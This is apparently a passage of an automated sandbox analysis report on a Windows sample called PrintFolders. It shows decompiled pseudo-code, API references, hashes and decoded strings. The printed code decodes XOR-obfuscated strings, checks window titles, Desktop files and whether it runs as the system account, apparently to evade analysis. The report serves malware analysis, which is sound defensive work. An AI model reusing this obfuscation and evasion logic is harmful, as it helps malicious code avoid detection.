								_v336 = 0xf;
								_v356 = 0;
								_t42 = _t208 + 1; // 0x450f65
								_t222 = _t42;
								do {
									_t122 =  *_t208;
									_t208 = _t208 + 1;
								} while (_t122 != 0);
								E004026B0(0x2e,  &_v356, 0x450f64, _t208 - _t222);
								_v8 = 0;
								_t193 = 1;
								_v284 = 1;
								_t125 =  >=  ? _v356 :  &_v356;
								_t127 = E004101E0( &_v276,  >=  ? _v356 :  &_v356);
								_t243 =  &(_t242[2]);
								if(_t127 != 0) {
									L42:
									_v305 = 1;
								} else {
									_t156 =  *0x450f60; // 0x80000014
									_v300 = 0x4b5c4779;
									_v296 = 0x5c4f465d;
									_v292 = 0x2e45;
									if(_t156 >  *((intOrPtr*)(_t229 + 4))) {
										E0040EF48(_t156, 0x450f60);
										_t243 = _t243 + 4;
										_t279 =  *0x450f60 - 0xffffffff;
										if( *0x450f60 == 0xffffffff) {
											asm("movq xmm0, [ebp-0x128]");
											_t54 =  &_v292; // 0x2e45
											asm("movq [0x450fd4], xmm0");
											 *0x450fdc =  *_t54;
											E0040F25B( &_v356, _t279, E0042CF40);
											E0040EEFE(0x450f60);
											_t243 = _t243 + 8;
										}
									}
									_t157 =  *0x450fdd; // 0x0
									if(_t157 != 0) {
										 *0x450fd4 =  *0x450fd4 ^ 0x0000002e;
										 *0x450fd5 =  *0x450fd5 ^ 0x0000002e;
										 *0x450fd6 =  *0x450fd6 ^ 0x0000002e;
										 *0x450fd7 =  *0x450fd7 ^ 0x0000002e;
										 *0x450fd8 =  *0x450fd8 ^ 0x0000002e;
										 *0x450fd9 =  *0x450fd9 ^ 0x0000002e;
										 *0x450fda =  *0x450fda ^ 0x0000002e;
										 *0x450fdb =  *0x450fdb ^ 0x0000002e;
										 *0x450fdc =  *0x450fdc ^ 0x0000002e;
										 *0x450fdd = _t157 ^ 0x0000002e;
									}
									_t217 = 0x450fd4;
									_v332 = 0;
									_v316 = 0;
									_v312 = 0xf;
									_t58 =  &(_t217[1]); // 0x450fd5
									_t222 = _t58;
									do {
										_t158 =  *_t217;
										_t217 =  &(_t217[1]);
									} while (_t158 != 0);
									E004026B0(_t193,  &_v332, 0x450fd4, _t217 - _t222);
									_t193 = 3;
									_t161 =  >=  ? _v332 :  &_v332;
									_t163 = E004101E0( &_v276,  >=  ? _v332 :  &_v332);
									_t243 = _t243 + 8;
									_v305 = 0;
									if(_t163 != 0) {
										goto L42;
									}
								}
								if((_t193 & 0x00000002) == 0) {
									L49:
									if((_t193 & 0x00000001) == 0) {
										L54:
										if(_v305 != 0) {
											goto L56;
										} else {
											goto L55;
										}
										L57:
										 *[fs:0x0] = _v16;
										_pop(_t225);
										_pop(_t230);
										_pop(_t191);
										return E0040EBBF(_t107, _t191, _v20 ^ _t233, _t222, _t225, _t230);
									} else {
										_t222 = _v336;
										if(_t222 < 0x10) {
											goto L54;
										} else {
											_t211 = _v356;
											_t222 =  &(_t222[0]);
											_t128 = _t211;
											if(_t222 < 0x1000) {
												L53:
												_push(_t222);
												E0040EDFF(_t211);
												goto L54;
											} else {
												_t211 =  *(_t211 - 4);
												_t222 =  &(_t222[8]);
												if(_t128 - _t211 + 0xfffffffc > 0x1f) {
													goto L58;
												} else {
													goto L53;
												}
											}
										}
									}
								} else {
									_t222 = _v312;
									_t193 = _t193 & 0xfffffffd;
									if(_t222 < 0x10) {
										L48:
										_v316 = 0;
										_v312 = 0xf;
										_v332 = 0;
										goto L49;
									} else {
										_t216 = _v332;
										_t222 =  &(_t222[0]);
										_t152 = _t216;
										if(_t222 < 0x1000) {
											L47:
											_push(_t222);
											E0040EDFF(_t216);
											_t243 = _t243 + 8;
											goto L48;
										} else {
											_t216 =  *(_t216 - 4);
											_t222 =  &(_t222[8]);
											if(_t152 - _t216 + 0xfffffffc > 0x1f) {
												L58:
												E00413527(_t193, _t222, __eflags);
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t233);
												_t234 = _t243;
												_t133 =  *0x43d054; // 0x7bd02ead
												_v380 = _t133 ^ _t234;
												_v464 = 0;
												_v460 = 0x500;
												_t137 = OpenProcessToken(GetCurrentProcess(), 8,  &_v472);
												__eflags = _t137;
												if(_t137 == 0) {
													L62:
													__eflags = _v12 ^ _t234;
													return E0040EBBF(0, _t193, _v12 ^ _t234, _t222, _t227, _t229);
												} else {
													_t142 = GetTokenInformation(_v104, 1,  &_v88, 0x4c,  &_v100); // executed
													_push(_v104);
													__eflags = _t142;
													if(_t142 != 0) {
														CloseHandle();
														_t146 = AllocateAndInitializeSid( &_v96, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v108);
														__eflags = _t146;
														if(_t146 == 0) {
															goto L62;
														} else {
															_t147 = EqualSid(_v88, _v108);
															FreeSid(_v108);
															__eflags = _v12 ^ _t234;
															_t232 = _t229;
															return E0040EBBF(_t147, _t193, _v12 ^ _t234, _t222, _t227, _t232);
														}
													} else {
														CloseHandle();
														goto L62;
													}
												}
											} else {
												goto L47;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x00405f40
0x00405f43
0x00405f45
0x00405f50
0x00405f51
0x00405f57
0x00405f5c
0x00405f5e
0x00405f61
0x00405f63
0x00405f64
0x00405f68
0x00405f6e
0x00405f7e
0x00405f88
0x00405f92
0x00405f94
0x00405f9f
0x00405fa6
0x00405fab
0x00405fae
0x00405fb5
0x00405fb7
0x00405fbd
0x00405fc8
0x00405fcd
0x00405fd3
0x00405fe0
0x00405fe5
0x00405fe5
0x00405fb5
0x00405fe8
0x00405fef
0x00405ff1
0x00405ff8
0x00405fff
0x00406006
0x0040600d
0x00406014
0x0040601b
0x00406024
0x00406024
0x00406029
0x0040602c
0x00406031
0x00406033
0x00406033
0x00406036
0x0040603c
0x00406043
0x0040604a
0x00406050
0x00406050
0x00406052
0x00406053
0x00406061
0x00406066
0x0040606b
0x00406070
0x004065ae
0x004065ae
0x00000000
0x00406076
0x00406076
0x0040607b
0x00406085
0x00406095
0x0040609c
0x004060a1
0x004060a4
0x004060ab
0x004060ad
0x004060b3
0x004060be
0x004060c3
0x004060c9
0x004060d6
0x004060db
0x004060db
0x004060ab
0x004060de
0x004060e5
0x004060e7
0x004060ee
0x004060f5
0x004060fc
0x00406103
0x0040610a
0x00406111
0x0040611a
0x0040611a
0x0040611f
0x00406122
0x00406127
0x00406129
0x00406129
0x0040612c
0x00406132
0x00406139
0x00406140
0x00406140
0x00406142
0x00406143
0x0040614f
0x00406151
0x00406156
0x0040615b
0x00406160
0x00000000
0x00406166
0x00406166
0x0040616b
0x00406175
0x0040617f
0x0040618e
0x00406195
0x0040619a
0x0040619d
0x004061a4
0x004061a6
0x004061ba
0x004061c2
0x004061c8
0x004061d5
0x004061da
0x004061da
0x004061a4
0x004061dd
0x004061e4
0x004061e6
0x004061ed
0x004061f4
0x004061fb
0x00406202
0x00406209
0x00406210
0x00406217
0x0040621e
0x00406227
0x00406227
0x0040622c
0x0040622f
0x00406234
0x00406236
0x00406236
0x00406239
0x0040623f
0x00406246
0x00406250
0x00406250
0x00406252
0x00406253
0x00406261
0x00406266
0x0040626b
0x00406270
0x00000000
0x00406276
0x00406276
0x0040627e
0x004065aa
0x004065aa
0x00000000
0x00406284
0x00406291
0x00406297
0x0040629e
0x004062a8
0x004062b2
0x004062bc
0x004062cb
0x004062d2
0x004062d7
0x004062da
0x004062e1
0x004062e3
0x004062e9
0x004062f1
0x004062f6
0x00406302
0x0040630a
0x00406310
0x00406316
0x00406323
0x00406328
0x00406328
0x004062e1
0x00406332
0x00406334
0x00406336
0x00406336
0x0040633c
0x0040633d
0x00406336
0x00406342
0x00406347
0x00406351
0x0040635b
0x00406365
0x0040636c
0x0040636c
0x00406370
0x00406370
0x00406372
0x00406373
0x00406385
0x0040638a
0x0040639e
0x004063a3
0x004063a9
0x004063b8
0x004063bd
0x004063c2
0x00406502
0x00406502
0x004063c8
0x004063c8
0x004063cd
0x004063d7
0x004063e1
0x004063f0
0x004063f7
0x004063fc
0x004063ff
0x00406406
0x00406408
0x00406410
0x0040641c
0x00406424
0x0040642a
0x00406437
0x0040643c
0x0040643c
0x00406406
0x0040643f
0x00406446
0x00406448
0x0040644f
0x00406456
0x0040645d
0x00406464
0x0040646b
0x00406472
0x00406479
0x00406480
0x00406489
0x00406489
0x0040648e
0x00406493
0x0040649d
0x004064a7
0x004064b1
0x004064b1
0x004064b4
0x004064b4
0x004064b6
0x004064b7
0x004064c9
0x004064db
0x004064e0
0x004064ef
0x004064f4
0x004064f7
0x00406500
0x00000000
0x00000000
0x00406500
0x0040650c
0x00406566
0x00406569
0x004065a1
0x004065a8
0x00000000
0x00000000
0x00000000
0x00000000
0x004065b0
0x004065b3
0x004065bb
0x004065bc
0x004065bd
0x004065cb
0x0040656b
0x0040656b
0x00406574
0x00000000
0x00406576
0x00406576
0x0040657c
0x0040657d
0x00406585
0x00406597
0x00406597
0x00406599
0x00000000
0x00406587
0x00406587
0x0040658a
0x00406595
0x00000000
0x00000000
0x00000000
0x00000000
0x00406595
0x00406585
0x00406574
0x0040650e
0x0040650e
0x00406514
0x0040651a
0x0040654b
0x0040654b
0x00406555
0x0040655f
0x00000000
0x0040651c
0x0040651c
0x00406522
0x00406523
0x0040652b
0x00406541
0x00406541
0x00406543
0x00406548
0x00000000
0x0040652d
0x0040652d
0x00406530
0x0040653b
0x004065cc
0x004065cc
0x004065d1
0x004065d2
0x004065d3
0x004065d4
0x004065d5
0x004065d6
0x004065d7
0x004065d8
0x004065d9
0x004065da
0x004065db
0x004065dc
0x004065dd
0x004065de
0x004065df
0x004065e0
0x004065e1
0x004065e6
0x004065ed
0x004065f3
0x004065fd
0x0040660a
0x00406610
0x00406612
0x00406636
0x0040663b
0x00406645
0x00406614
0x00406623
0x00406629
0x0040662c
0x0040662e
0x00406646
0x00406666
0x0040666c
0x0040666e
0x00000000
0x00406670
0x00406677
0x00406682
0x0040668d
0x0040668f
0x00406698
0x00406698
0x00406630
0x00406630
0x00000000
0x00406630
0x0040662e
0x00000000
0x00000000
0x00000000
0x0040653b
0x0040652b
0x0040651a
0x0040650c
0x0040627e
0x00406270
0x00406160

APIs

__Init_thread_footer.LIBCMT ref: 00405FE0

Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2

__Init_thread_footer.LIBCMT ref: 004061D5
GetForegroundWindow.USER32 ref: 00406276
GetWindowTextA.USER32 ref: 00406291
__Init_thread_footer.LIBCMT ref: 00406323
__Init_thread_footer.LIBCMT ref: 004060D6

Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90

__Init_thread_footer.LIBCMT ref: 00406437

Strings

fOMEK\YG\K]FO\E., xrefs: 004062E3
E., xrefs: 0040617F
yG\K, xrefs: 004063CD
~\AM, xrefs: 0040629E

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: Init_thread_footer$CriticalSection$EnterLeaveWindow$ConditionForegroundTextVariableWake
String ID: E.$fOMEK\YG\K]FO\E.$yG\K$~\AM
API String ID: 1590647277-3754284071
Opcode ID: bc234d3f8a5cc926224b41c12a7a08888321062f72d41a8dac0ac9900901a028
Instruction ID: e9c2673cefaa3185768bab40f11baeefcd31a664600fc35e2933cd877b2fe628
Opcode Fuzzy Hash: bc234d3f8a5cc926224b41c12a7a08888321062f72d41a8dac0ac9900901a028
Instruction Fuzzy Hash: 7EF107799003848ADB35DB34EC067EA7B70AB05319F1405FED8492A2D3D7F99A98CB4D

Uniqueness

Uniqueness Score: -1.00%

Function 00402BF0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 113
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00402BF0(void* __ebx, intOrPtr* __ecx, void** __edx) {
				signed int _v8;
				long _v12;
				char _v16;
				void* __edi;
				void* __esi;
				signed int _t31;
				long _t45;
				void* _t49;
				signed int _t60;
				signed int _t63;
				intOrPtr* _t64;
				signed int _t71;
				char _t72;
				void* _t77;
				long _t79;
				void* _t80;
				signed int _t81;
				void* _t82;
				signed int _t84;

				_t76 = __edx;
				_t64 = __ecx;
				_t62 = __ebx;
				_t31 =  *0x43d054; // 0x7bd02ead
				_v8 = _t31 ^ _t84;
				_t79 = __edx[2];
				if(_t79 == 0) {
					L8:
					_t16 =  &_v8; // 0x403426
					return E0040EBBF(1, _t62,  *_t16 ^ _t84, _t76, _t79, _t80);
				} else {
					_t81 = __edx[3];
					if((_t81 & 0x02000000) == 0) {
						_t71 =  *(0x439848 + ((_t81 >> 0x1f) + ((_t81 >> 0x0000001e & 0x00000001) + (_t81 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
						_t80 = _t81 & 0x04000000;
						_t44 =  ==  ? _t71 : _t71 | 0x00000200;
						_t45 = VirtualProtect( *__edx, _t79,  ==  ? _t71 : _t71 | 0x00000200,  &_v12); // executed
						if(_t45 != 0) {
							goto L8;
						} else {
							FormatMessageA(0x1300, 0, GetLastError(), 0x400,  &_v16, _t45, _t45);
							_t72 = _v16;
							_t77 = _t72 + 1;
							do {
								_t49 =  *_t72;
								_t72 = _t72 + 1;
							} while (_t49 != 0);
							_t82 = LocalAlloc(0x40, _t72 - _t77 + 0x1f);
							E00402B20(_t82, "%s: %s", "Error protecting memory page");
							OutputDebugStringA(_t82);
							LocalFree(_t82);
							LocalFree(_v16);
							_t30 =  &_v8; // 0x403426
							return E0040EBBF(0, __ebx,  *_t30 ^ _t84, _t77, _t79, LocalFree, _v16);
						}
					} else {
						_t80 =  *__edx;
						if(_t80 == __edx[1]) {
							_push(__ebx);
							if(__edx[4] != 0) {
								L6:
								 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x20))))(_t80, _t79, 0x4000,  *((intOrPtr*)(_t64 + 0x34))); // executed
							} else {
								_t63 =  *(__ecx + 0x3c);
								if( *((intOrPtr*)( *__ecx + 0x38)) == _t63) {
									goto L6;
								} else {
									_t60 = _t79;
									_t76 = _t60 % _t63;
									if(_t60 % _t63 == 0) {
										goto L6;
									}
								}
							}
							_pop(_t62);
						}
						goto L8;
					}
				}
			}

0x00402bf0
0x00402bf0
0x00402bf0
0x00402bf6
0x00402bfd
0x00402c02
0x00402c07
0x00402c4a
0x00402c50
0x00402c5d
0x00402c09
0x00402c09
0x00402c12
0x00402c79
0x00402c8b
0x00402c91
0x00402c98
0x00402ca0
0x00000000
0x00402ca2
0x00402cbb
0x00402cc1
0x00402cc4
0x00402cc7
0x00402cc7
0x00402cc9
0x00402cca
0x00402cdf
0x00402cec
0x00402cf5
0x00402d02
0x00402d07
0x00402d09
0x00402d1a
0x00402d1a
0x00402c14
0x00402c14
0x00402c19
0x00402c1f
0x00402c20
0x00402c36
0x00402c43
0x00402c22
0x00402c24
0x00402c2a
0x00000000
0x00402c2c
0x00402c2e
0x00402c30
0x00402c34
0x00000000
0x00000000
0x00402c34
0x00402c2a
0x00402c48
0x00402c48
0x00000000
0x00402c19
0x00402c12

APIs

VirtualProtect.KERNEL32(?,?,?,?,00000000,?,?,?,00403426), ref: 00402C98
GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,00403426), ref: 00402CAD
FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,00403426), ref: 00402CBB
LocalAlloc.KERNEL32(00000040,?,?,?,00403426), ref: 00402CD6
OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,00403426), ref: 00402CF5
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00403426), ref: 00402D02
LocalFree.KERNEL32(?,?,?,?,?,?,?,00403426), ref: 00402D07

Strings

&4@, xrefs: 00402C50, 00402D09
%s: %s, xrefs: 00402CE6
Error protecting memory page, xrefs: 00402CE1

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
String ID: %s: %s$&4@$Error protecting memory page
API String ID: 839691724-739521694
Opcode ID: f7e83cb46c05e663735d1022c7d68b0119dfbf9cc7d77a07b31833e59155f675
Instruction ID: 56ecb5147128ac6811eeaed226ebfad5a34a2763694ba038d08261f378adde64
Opcode Fuzzy Hash: f7e83cb46c05e663735d1022c7d68b0119dfbf9cc7d77a07b31833e59155f675
Instruction Fuzzy Hash: D6312531B00114AFE714AF69DC44FAEB769EF45300F1401AAE901AB2D1CAB5AD02CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404840 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 335
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00404840(void* __ebx, void* __ecx) {
				intOrPtr _v8;
				int _v16;
				char _v24;
				int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				long _v56;
				int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				long _v76;
				char _v77;
				char _v78;
				char _v84;
				long _v88;
				int _v92;
				char _v93;
				signed int _v100;
				intOrPtr _v104;
				int _v108;
				long _v112;
				int _v116;
				int _v128;
				int _v132;
				int _v136;
				char _v144;
				signed int _v152;
				char _v296;
				char _v300;
				char _v304;
				char _v552;
				intOrPtr _v1580;
				int _v1588;
				int _v1592;
				long _v1596;
				int _v1600;
				int _v1616;
				struct HKL__* _v1684;
				signed int _v1688;
				int _v1692;
				int _v1728;
				intOrPtr _v1748;
				char _v1756;
				signed int _v1760;
				intOrPtr _v1772;
				intOrPtr _v1776;
				signed int _v1780;
				intOrPtr _v1816;
				intOrPtr _v1820;
				signed int _v1872;
				char _v2122;
				short _v2124;
				int* _v2140;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t208;
				signed int _t209;
				intOrPtr _t212;
				intOrPtr _t213;
				intOrPtr* _t217;
				intOrPtr _t218;
				intOrPtr _t223;
				signed char _t224;
				signed char _t225;
				void* _t227;
				intOrPtr _t228;
				signed char _t229;
				intOrPtr _t230;
				void* _t232;
				intOrPtr _t233;
				intOrPtr _t234;
				void* _t236;
				int _t239;
				signed int _t245;
				signed int _t246;
				signed int _t249;
				int _t252;
				intOrPtr* _t254;
				int _t258;
				int _t260;
				signed int _t266;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t278;
				signed int _t284;
				short _t286;
				signed int _t291;
				signed int _t297;
				signed char _t303;
				signed char* _t304;
				void* _t309;
				long _t310;
				intOrPtr _t311;
				int _t312;
				intOrPtr _t316;
				intOrPtr _t317;
				int _t318;
				int _t322;
				void* _t326;
				signed int _t327;
				void* _t333;
				int _t350;
				signed int _t355;
				void* _t361;
				int* _t363;
				signed int _t365;
				int _t366;
				void* _t367;
				void* _t369;
				intOrPtr* _t370;
				intOrPtr* _t373;
				signed char* _t377;
				intOrPtr* _t381;
				intOrPtr* _t385;
				int _t393;
				signed int _t399;
				int _t401;
				int _t404;
				signed int* _t405;
				signed int _t415;
				intOrPtr* _t416;
				signed int _t422;
				int _t426;
				void* _t427;
				long _t429;
				int* _t431;
				int* _t432;
				int* _t433;
				long _t434;
				void* _t435;
				void* _t439;
				signed char* _t440;
				void* _t441;
				int _t443;
				void* _t444;
				signed int _t445;
				void* _t446;
				signed int _t447;
				void* _t448;
				int* _t449;
				void* _t450;
				void* _t451;
				int _t452;
				signed char* _t453;
				void* _t454;
				void* _t455;
				void* _t456;
				int _t457;
				void* _t458;
				void* _t459;
				signed int _t460;
				void* _t462;
				void* _t463;
				int _t464;
				void* _t467;
				signed int _t470;
				signed int _t473;
				signed int _t475;
				signed int _t477;
				void* _t479;
				signed int _t482;
				void* _t483;
				int* _t484;
				int* _t485;
				int* _t486;
				int* _t487;
				int* _t488;
				int* _t489;
				signed int _t495;
				signed int _t496;
				void* _t499;
				signed int _t501;

				_t369 = __ecx;
				_push(__ebx);
				_t361 = _t479;
				_t482 = (_t479 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t361 + 4));
				_t470 = _t482;
				_push(0xffffffff);
				_push(0x42c515);
				_push( *[fs:0x0]);
				_push(_t361);
				_t483 = _t482 - 0x50;
				_t208 =  *0x43d054; // 0x7bd02ead
				_t209 = _t208 ^ _t470;
				_v32 = _t209;
				_push(_t451);
				_push(_t209);
				 *[fs:0x0] =  &_v24;
				_v48 = 0x7c6b7d7b;
				_v44 = 0x68617c7e;
				_v40 = 0x2e6b6267;
				_t443 =  *( *[fs:0x2c]);
				_t212 =  *0x450efc; // 0x8000000b
				if(_t212 >  *((intOrPtr*)(_t443 + 4))) {
					E0040EF48(_t212, 0x450efc);
					_t483 = _t483 + 4;
					_t512 =  *0x450efc - 0xffffffff;
					if( *0x450efc == 0xffffffff) {
						asm("movq xmm0, [ebp-0x24]");
						asm("movq [0x450ea4], xmm0");
						 *0x450eac = _v40;
						E0040F25B(_t369, _t512, 0x42cec0);
						E0040EEFE(0x450efc);
						_t483 = _t483 + 8;
					}
				}
				if( *0x450eaf != 0) {
					_t355 = 0;
					do {
						 *(_t355 + 0x450ea4) =  *(_t355 + 0x450ea4) ^ 0x0000002e;
						_t355 = _t355 + 1;
					} while (_t355 < 0xc);
				}
				_t370 = 0x450ea4;
				_v108 = 0;
				_v92 = 0;
				_v88 = 0xf;
				_v108 = 0;
				_t16 = _t370 + 1; // 0x450ea5
				_t427 = _t16;
				do {
					_t213 =  *_t370;
					_t370 = _t370 + 1;
				} while (_t213 != 0);
				E004026B0(_t361,  &_v108, 0x450ea4, _t370 - _t427);
				_v16 = 0;
				_t216 =  >=  ? _v108 :  &_v108;
				_t217 = E00418B65(_t361, _t443, _t451,  >=  ? _v108 :  &_v108,  >=  ? _v108 :  &_v108);
				_t428 = _t217;
				_v76 = 0;
				_t373 = _t217;
				_v60 = 0;
				_t484 = _t483 + 4;
				_v56 = 0xf;
				_v76 = 0;
				_t26 = _t373 + 1; // 0x1
				_t452 = _t26;
				do {
					_t218 =  *_t373;
					_t373 = _t373 + 1;
				} while (_t218 != 0);
				E004026B0(_t361,  &_v76, _t428, _t373 - _t452);
				_v16 = 2;
				_t429 = _v88;
				if(_t429 < 0x10) {
					L14:
					_t376 = _v60;
					_v92 = 0;
					_v88 = 0xf;
					_v108 = 0;
					_push(8);
					_push("\\Desktop");
					if(_v56 - _t376 < 8) {
						_v84 = 0;
						_t376 =  &_v76;
						_push(_v84);
						_push(8);
						E00402980(_t361,  &_v76, _t443, _t452);
					} else {
						_t38 = _t376 + 8; // 0x8
						_t466 =  >=  ? _v76 :  &_v76;
						_t467 = ( >=  ? _v76 :  &_v76) + _t376;
						_v60 = _t38;
						_push(_t467);
						E004104C0();
						_t484 =  &(_t484[3]);
						 *((char*)(_t467 + 8)) = 0;
					}
					_t223 =  *0x450f04; // 0x8000000c
					_v44 = 0x4b426d6d;
					_v40 = 0x5c4b404f;
					_v77 = 0x2e;
					if(_t223 >  *((intOrPtr*)(_t443 + 4))) {
						E0040EF48(_t223, 0x450f04);
						_t484 =  &(_t484[1]);
						_t526 =  *0x450f04 - 0xffffffff;
						if( *0x450f04 == 0xffffffff) {
							asm("movq xmm0, [ebp-0x20]");
							asm("movq [0x450f3c], xmm0");
							 *0x450f44 = _v77;
							E0040F25B(_t376, _t526, 0x42cea0);
							E0040EEFE(0x450f04);
							_t484 =  &(_t484[2]);
						}
					}
					_t224 =  *0x450f44; // 0x0
					if(_t224 != 0) {
						 *0x450f3c =  *0x450f3c ^ 0x0000002e;
						 *0x450f3d =  *0x450f3d ^ 0x0000002e;
						 *0x450f3e =  *0x450f3e ^ 0x0000002e;
						 *0x450f3f =  *0x450f3f ^ 0x0000002e;
						 *0x450f40 =  *0x450f40 ^ 0x0000002e;
						 *0x450f41 =  *0x450f41 ^ 0x0000002e;
						 *0x450f42 =  *0x450f42 ^ 0x0000002e;
						 *0x450f43 =  *0x450f43 ^ 0x0000002e;
						 *0x450f44 = _t224 ^ 0x0000002e;
					}
					_t485 = _t484 - 0x18;
					_t377 = 0x450f3c;
					_t431 = _t485;
					_t50 =  &(_t377[1]); // 0x450f3d
					_t453 = _t50;
					 *_t431 = 0;
					_t431[4] = 0;
					_t431[5] = 0xf;
					do {
						_t225 =  *_t377;
						_t377 =  &(_t377[1]);
					} while (_t225 != 0);
					E004026B0(_t361, _t431, 0x450f3c, _t377 - _t453);
					_t227 = E00404490(_t361,  &_v76, _t431); // executed
					_t486 =  &(_t485[6]);
					_v77 = 0x2e;
					_t228 =  *0x450fa0; // 0x8000000d
					_v78 = _t227 != 0;
					if(_t228 >  *((intOrPtr*)(_t443 + 4))) {
						E0040EF48(_t228, 0x450fa0);
						_t486 =  &(_t486[1]);
						_t532 =  *0x450fa0 - 0xffffffff;
						if( *0x450fa0 == 0xffffffff) {
							asm("movaps xmm0, [0x439d80]");
							asm("movups [0x450ec0], xmm0");
							 *0x450ed0 = _v77;
							E0040F25B( &_v76, _t532, 0x42ce80);
							E0040EEFE(0x450fa0);
							_t486 =  &(_t486[2]);
						}
					}
					_t229 =  *0x450ed0; // 0x0
					if(_t229 != 0) {
						asm("movups xmm0, [0x450ec0]");
						asm("movaps xmm1, [0x439d30]");
						asm("pxor xmm1, xmm0");
						 *0x450ed0 = _t229 ^ 0x0000002e;
						asm("movups [0x450ec0], xmm1");
					}
					_t487 = _t486 - 0x18;
					_t381 = 0x450ec0;
					_t432 = _t487;
					_t58 = _t381 + 1; // 0x450ec1
					_t454 = _t58;
					 *_t432 = 0;
					_t432[4] = 0;
					_t432[5] = 0xf;
					do {
						_t230 =  *_t381;
						_t381 = _t381 + 1;
					} while (_t230 != 0);
					E004026B0(_t361, _t432, 0x450ec0, _t381 - _t454);
					_t232 = E00404490(_t361,  &_v76, _t432); // executed
					_t488 =  &(_t487[6]);
					_v36 = 0x2e6d;
					_t233 =  *0x450f08; // 0x8000000e
					_v77 = _t232 != 0;
					if(_t233 >  *((intOrPtr*)(_t443 + 4))) {
						E0040EF48(_t233, 0x450f08);
						_t488 =  &(_t488[1]);
						_t537 =  *0x450f08 - 0xffffffff;
						if( *0x450f08 == 0xffffffff) {
							asm("movaps xmm0, [0x439da0]");
							asm("movups [0x450f78], xmm0");
							 *0x450f88 = _v36;
							E0040F25B( &_v76, _t537, 0x42ce60);
							E0040EEFE(0x450f08);
							_t488 =  &(_t488[2]);
						}
					}
					if( *0x450f89 != 0) {
						asm("movups xmm0, [0x450f78]");
						_t333 = 0x10;
						asm("movaps xmm1, [0x439d30]");
						asm("pxor xmm1, xmm0");
						asm("movups [0x450f78], xmm1");
						do {
							 *(_t333 + 0x450f78) =  *(_t333 + 0x450f78) ^ 0x0000002e;
							_t333 = _t333 + 1;
						} while (_t333 < 0x12);
					}
					_t489 = _t488 - 0x18;
					_t385 = 0x450f78;
					_t433 = _t489;
					_t68 = _t385 + 1; // 0x450f79
					_t455 = _t68;
					 *_t433 = 0;
					_t433[4] = 0;
					_t433[5] = 0xf;
					do {
						_t234 =  *_t385;
						_t385 = _t385 + 1;
					} while (_t234 != 0);
					E004026B0(_t361, _t433, 0x450f78, _t385 - _t455);
					_t236 = E00404490(_t361,  &_v76, _t433); // executed
					_t484 =  &(_t489[6]);
					if(_t236 == 0 || _v78 == 0 || _v77 == 0) {
						_t452 = 0;
						__eflags = 0;
					} else {
						_t452 = 1;
					}
					_t434 = _v56;
					if(_t434 < 0x10) {
						L48:
						 *[fs:0x0] = _v24;
						_pop(_t444);
						_pop(_t456);
						return E0040EBBF(_t452, _t361, _v32 ^ _t470, _t434, _t444, _t456);
					} else {
						_t393 = _v76;
						_t434 = _t434 + 1;
						_t239 = _t393;
						if(_t434 < 0x1000) {
							L47:
							_push(_t434);
							E0040EDFF(_t393);
							goto L48;
						} else {
							_t393 =  *(_t393 - 4);
							_t434 = _t434 + 0x23;
							if(_t239 - _t393 + 0xfffffffc > 0x1f) {
								goto L50;
							} else {
								goto L47;
							}
						}
					}
				} else {
					_t426 = _v108;
					_t441 = _t429 + 1;
					_t350 = _t426;
					if(_t441 < 0x1000) {
						L13:
						_push(_t441);
						E0040EDFF(_t426);
						_t484 =  &(_t484[2]);
						goto L14;
					} else {
						_t393 =  *(_t426 - 4);
						_t434 = _t441 + 0x23;
						if(_t350 - _t393 + 0xfffffffc > 0x1f) {
							E00413527(_t361, _t434, __eflags);
							L50:
							E00413527(_t361, _t434, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
